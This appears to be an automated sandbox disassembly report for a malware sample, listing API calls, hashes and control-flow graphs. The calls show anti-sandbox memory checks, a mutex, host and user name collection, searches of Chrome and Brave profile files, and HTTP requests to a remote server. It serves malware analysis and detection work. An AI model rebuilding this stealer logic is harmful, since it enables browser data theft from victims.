                                      • API String ID: 3511611419-0
                                      • Opcode ID: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
                                      • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                      • Opcode Fuzzy Hash: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
                                      • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                      Control-flow Graph

                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
                                      • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                      • Opcode Fuzzy Hash: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
                                      • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1492 401220-401247 call 4189b0 GlobalMemoryStatusEx 1495 401273-40127a 1492->1495 1496 401249-401271 call 41da00 * 2 1492->1496 1497 401281-401285 1495->1497 1496->1497 1500 401287 1497->1500 1501 40129a-40129d 1497->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • __aulldiv.LIBCMT ref: 00401258
                                      • __aulldiv.LIBCMT ref: 00401266
                                      • ExitProcess.KERNEL32 ref: 00401294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1506 416af3 1507 416b0a 1506->1507 1509 416aba-416ad7 call 41aad0 OpenEventA 1507->1509 1510 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1507->1510 1516 416af5-416b04 CloseHandle Sleep 1509->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1509->1517 1516->1507 1517->1510
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00690100,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00690100,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                      • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,006C0DE0), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,006C04D0,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
                                      • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                      • Opcode Fuzzy Hash: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
                                      • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocComputerNameProcess
                                      • String ID:
                                      • API String ID: 4203777966-0
                                      • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                      • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • ExitProcess.KERNEL32 ref: 00401143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                      • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0069363F
                                      • Module32First.KERNEL32(00000000,00000224), ref: 0069365F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_691000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: 179852427f998eb08ba9e617d0c8f08d9efdb3e0a2d9f18becb215fbb32e75da
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: DEF062312007217BDB202BB9A88DAAA76EDBF49764F100529E642D1BC0DB70E9458A65
                                      APIs
                                      • SetErrorMode.KERNEL32(00000400,?,?,022D0223,?,?), ref: 022D0E19
                                      • SetErrorMode.KERNEL32(00000000,?,?,022D0223,?,?), ref: 022D0E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 50aa6c00ba5b177b5bbeec93bfda0059b8d1f6a57755c1eca6658fe1f3340d39
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: FED0123115512877D7002AE4DC09BCD7B1CDF09B66F008011FB0DD9080C770964046E5
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                      • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                      APIs
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • ExitProcess.KERNEL32 ref: 004011C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 1004333139-0
                                      • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                      • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00693327
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_691000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: 1fa526225703f83a6e604e3255146bff0d80c3489026b4d5c053ecbbb7ad3734
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: 37113C79A40208EFDB01DF98C985E98BBF5AF08350F058095FA489B362D771EA50DF80
                                      APIs
                                      • wsprintfA.USER32 ref: 004138CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-817767981
                                      • Opcode ID: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
                                      • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                      • Opcode Fuzzy Hash: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
                                      • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
                                      • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                      • Opcode Fuzzy Hash: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
                                      • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                      APIs
                                      • wsprintfA.USER32 ref: 0041492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
                                      • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                      • Opcode Fuzzy Hash: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
                                      • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 022E3B33
                                      • FindFirstFileA.KERNEL32(?,?), ref: 022E3B4A
                                      • lstrcat.KERNEL32(?,?), ref: 022E3B9C
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 022E3BAE
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 022E3BC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022E3ECE
                                      • FindClose.KERNEL32(000000FF), ref: 022E3EE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 1125553467-0
                                      • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction ID: a8a3bb34af7e2500e80b847235b5e56733963ffb6ca62fefeb3cc3aa77d66708
                                      • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction Fuzzy Hash: 9FA15EB5A50218ABDF24EFA4CC84FFE737AAF49301F444588A50E96144DB759B84CF62
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • wsprintfA.USER32 ref: 004145A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                      • FindClose.KERNEL32(000000FF), ref: 004146A0
                                      • lstrcatA.KERNEL32(?,006C0F90,?,00000104), ref: 004146C5
                                      • lstrcatA.KERNEL32(?,006BFF20), ref: 004146D8
                                      • lstrlenA.KERNEL32(?), ref: 004146E5
                                      • lstrlenA.KERNEL32(?), ref: 004146F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 13328894-2848263008
                                      • Opcode ID: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
                                      • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                      • Opcode Fuzzy Hash: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
                                      • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                      APIs
                                      • wsprintfA.USER32 ref: 022E4B93
